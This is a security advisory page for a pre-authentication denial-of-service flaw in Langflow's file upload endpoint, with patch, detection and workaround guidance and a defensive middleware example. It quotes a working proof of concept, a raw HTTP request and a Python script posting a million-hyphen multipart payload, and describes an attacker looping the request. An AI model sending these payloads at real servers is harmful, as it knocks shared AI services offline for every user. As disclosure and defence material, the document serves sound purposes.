Langflow versions before 1.0.19 expose a file upload endpoint that processes multipart form data before enforcing any authentication, allowing a single unauthenticated HTTP POST with an oversized boundary string to permanently hang the server for all users. The attack requires zero credentials and zero knowledge of valid flow IDs — the PoC is embedded in the public security advisory, making mass exploitation trivially automatable with a single Python script. Langflow carries 53 prior CVEs and a 77/100 package risk score, signaling chronic security debt in a package with significant AI production adoption. Upgrade to 1.0.19 immediately, or block /api/v1/files/upload/ at your WAF or reverse proxy until patching is complete.
What is the risk?
CVSS 7.5 High with a fully network-accessible, zero-authentication, zero-interaction attack vector (AV:N/AC:L/PR:N/UI:N/A:H). The vulnerability is pre-auth, requires a single malformed HTTP request, and has a public PoC — placing real-world exploit time at near-zero for any attacker with basic scripting ability. Availability impact is complete and persistent: the server hangs indefinitely until restarted, and an attacker can re-trigger immediately upon recovery. While confidentiality and integrity are not directly compromised, DoS of an LLM workflow orchestrator cascades to production AI pipelines, agent automations, and any upstream services depending on the Langflow API. The 53 CVE history elevates organizational risk for adopters beyond this single issue.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Langflow | pip | < 1.0.19 | 1.0.19 |
What should I do?
4 steps:
1. PATCH: Upgrade the langflow pip package to >=1.0.19. The fix introduces a check_boundary HTTP middleware that validates the multipart boundary against ^[\w\-]{1,70}$ and rejects malformed requests with HTTP 422 before body parsing; the upload endpoint also now enforces authentication and flow-ownership (get_current_active_user + 403 on mismatch).
2. DETECT: Alert on POST /api/v1/files/upload/ requests from unauthenticated sources with Content-Length >1MB or boundary strings exceeding 70 characters in server access logs.
3. WORKAROUND: If immediate patching is not possible, block or rate-limit /api/v1/files/upload/ at the reverse proxy or WAF layer and enforce a request body size cap (e.g., 10MB in nginx/Caddy) to bound hang duration.
4. NETWORK: Ensure Langflow is never directly internet-exposed; place behind an authentication proxy or VPN for all internal deployments.
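The PATCH step describes a boundary check that runs before body parsing. The request in the original advisory declares a short boundary that passes the pattern and puts the excess hyphens after the closing delimiter, so the example below also checks how the body is framed. This is an added example, not Langflow's code or the code from PR #3923: the names `boundary_from`, `rejection_reason`, `BoundaryGuard` and `MAX_BODY`, the strict framing rule and the 10MB buffer cap are assumptions.

```python
import re

BOUNDARY_RE = re.compile(r"^[\w\-]{1,70}$")  # pattern quoted in the advisory
UPLOAD_PREFIX = "/api/v1/files/upload"       # path named on this page
MAX_BODY = 10 * 1024 * 1024                  # assumed cap for the buffered body

def boundary_from(content_type: str) -> "str | None":
    """Return the boundary parameter of a multipart/form-data header, else None."""
    media, _, params = content_type.partition(";")
    if media.strip().lower() != "multipart/form-data":
        return None
    for param in params.split(";"):
        name, _, value = param.partition("=")
        if name.strip().lower() == "boundary":
            return value.strip().strip('"')
    return None

def rejection_reason(content_type: str, body: bytes) -> "str | None":
    """Return why the upload deserves a 422, or None if it is well framed."""
    boundary = boundary_from(content_type)
    if boundary is None or not BOUNDARY_RE.fullmatch(boundary):
        return "missing or invalid multipart boundary"
    opening = b"--" + boundary.encode()
    # Assumed strict framing: delimiter first, terminator last (one CRLF allowed after).
    if not body.startswith(opening + b"\r\n"):
        return "body does not start with the boundary"
    if not body.removesuffix(b"\r\n").endswith(b"\r\n" + opening + b"--"):
        return "body does not end with the closing boundary"
    return None

class BoundaryGuard:
    """Pure ASGI middleware: answer 422 before the wrapped app parses the form."""
    def __init__(self, app):
        self.app = app
    async def __call__(self, scope, receive, send):
        if scope["type"] != "http" or not scope["path"].startswith(UPLOAD_PREFIX):
            return await self.app(scope, receive, send)
        ctype = dict(scope["headers"]).get(b"content-type", b"").decode("latin-1")
        body, more = b"", True
        while more and len(body) <= MAX_BODY:  # buffer the body, bounded
            msg = await receive()
            body, more = body + msg.get("body", b""), msg.get("more_body", False)
        reason = "body too large" if more or len(body) > MAX_BODY else rejection_reason(ctype, body)
        if reason is None:
            async def replay():  # hand the buffered body back to the app
                return {"type": "http.request", "body": body, "more_body": False}
            return await self.app(scope, replay, send)
        await send({"type": "http.response.start", "status": 422, "headers": []})
        await send({"type": "http.response.body", "body": reason.encode()})
```

Because it is plain ASGI, the guard can wrap any ASGI application object, and the wrapped app only receives upload bodies that are already buffered and correctly framed.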
Frequently Asked Questions
Is CVE-2026-55446 actively exploited?
No confirmed active exploitation of CVE-2026-55446 has been reported, but organizations should still patch proactively.
What systems are affected by CVE-2026-55446?
This vulnerability affects the following AI/ML architecture patterns: LLM workflow platforms, agent frameworks, RAG pipelines, model serving.
What is the CVSS score for CVE-2026-55446?
CVE-2026-55446 has a CVSS v3.1 base score of 7.5 (HIGH).
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0029 Denial of AI Service
- AML.T0034.001 Resource-Intensive Queries
- AML.T0049 Exploit Public-Facing Application
What are the technical details?
Original Advisory
### Summary

An attacker can send a `/api/v1/files/upload/` request without any authentication token/cookies and abuse a very long multipart form boundary to make the langflow app unusable for all users for an indefinite amount of time.

### Details

https://github.com/langflow-ai/langflow/blob/v1.0.18/src/backend/base/langflow/api/v1/files.py#L40

The file upload function will try to process the multipart form data even if it is malformed and contains a payload such as an extremely large amount of hyphens after the boundary. It also does not do the authentication check before trying to process this data so an unauthenticated attacker can perform this as well as authenticated users. Additionally, an attacker doesn't even need to know a valid UUID of a flow to send this request because the server will still try to process the large boundary even with any random value in place of the flow ID.

### PoC

An attacker makes this request to upload a file without valid authentication information or a valid flow ID:

```
POST /api/v1/files/upload/test HTTP/1.1
Host: 127.0.0.1:7860
Content-Length: 3000192
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryorGBAKSkv5wR6WqJ
Accept: application/json, text/plain, */*
Origin: http://127.0.0.1:7860
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryorGBAKSkv5wR6WqJ
Content-Disposition: form-data; name="file"; filename="dos.txt"
Content-Type: text/plain

DoS in progress!
------WebKitFormBoundaryorGBAKSkv5wR6WqJ------------<insert a large amount of hyphens such as 1,000,000>
```

Here is the request in python:

```python
import requests

url = "http://127.0.0.1:7860/api/v1/files/upload/test"
headers = {
    "Content-Type": "multipart/form-data; boundary=---------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ"
}
data = (
    "-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ\r\n"
    "Content-Disposition: form-data; name=\"file\"; filename=\"dos.txt\"\r\n"
    "Content-Type: text/plain\r\n\r\n"
    "DoS in progress\r\n"
    "-----------------------------WebKitFormBoundaryorGBAKSkv5wR6WqJ--" + '-' * 1000000 + "\r\n"
)
response = requests.post(url, headers=headers, data=data)
```

The app will then be stuck in the "server is busy" state for all users.

### Impact

Sending this request will result in the server being unusable for all users for an infinite amount of time because the request can be repeated as much as you want.

### Patches

Fixed in **1.0.19** via PR [#3923](https://github.com/langflow-ai/langflow/pull/3923). A `check_boundary` HTTP middleware was added that validates the multipart boundary (`^[\w\-]{1,70}$`) and rejects malformed requests — including the oversized-hyphen payload — with `HTTP 422` **before** the body is parsed. The upload endpoint also gained an authentication and flow-ownership check (`get_current_active_user` + `403` on mismatch), closing the unauthenticated access vector. Upgrade to **1.0.19 or later**.
Exploitation Scenario
An adversary targeting an organization's AI automation stack identifies a publicly exposed Langflow instance via Shodan or OSINT on the company's technology footprint. Without any credentials or knowledge of valid flow IDs, the attacker sends a single HTTP POST to /api/v1/files/upload/test with a multipart Content-Type boundary followed by 1,000,000 hyphens. The Langflow web server worker blocks indefinitely attempting to parse the malformed body before any auth check executes, rendering the entire service unavailable. The attacker scripts a loop to re-send on any service recovery — effectively maintaining a persistent DoS against all LLM workflows, RAG pipelines, and agentic automations running on the instance with minimal infrastructure cost and zero attribution risk.
Weaknesses (CWE)
CWE-400 — Uncontrolled Resource Consumption: The product does not properly control the allocation and maintenance of a limited resource.
- [Architecture and Design] Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.
- [Architecture and Design] Mitigation of resource exhaustion attacks requires that the target system either: recognizes the attack and denies that user further access for a given amount of time, or uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed. The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question. The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Related Vulnerabilities
| CVE | CVSS | Summary | Relation |
|---|---|---|---|
| CVE-2026-55255 | 9.9 | Langflow: IDOR allows cross-user flow execution | Same package: langflow |
| CVE-2026-33309 | 9.9 | langflow: Path Traversal enables file access | Same package: langflow |
| CVE-2026-33017 | 9.8 | langflow: Code Injection enables RCE | Same package: langflow |
| CVE-2024-37014 | 9.8 | Langflow: unauthenticated RCE via custom component API | Same package: langflow |
| CVE-2026-27966 | 9.8 | langflow: Code Injection enables RCE | Same package: langflow |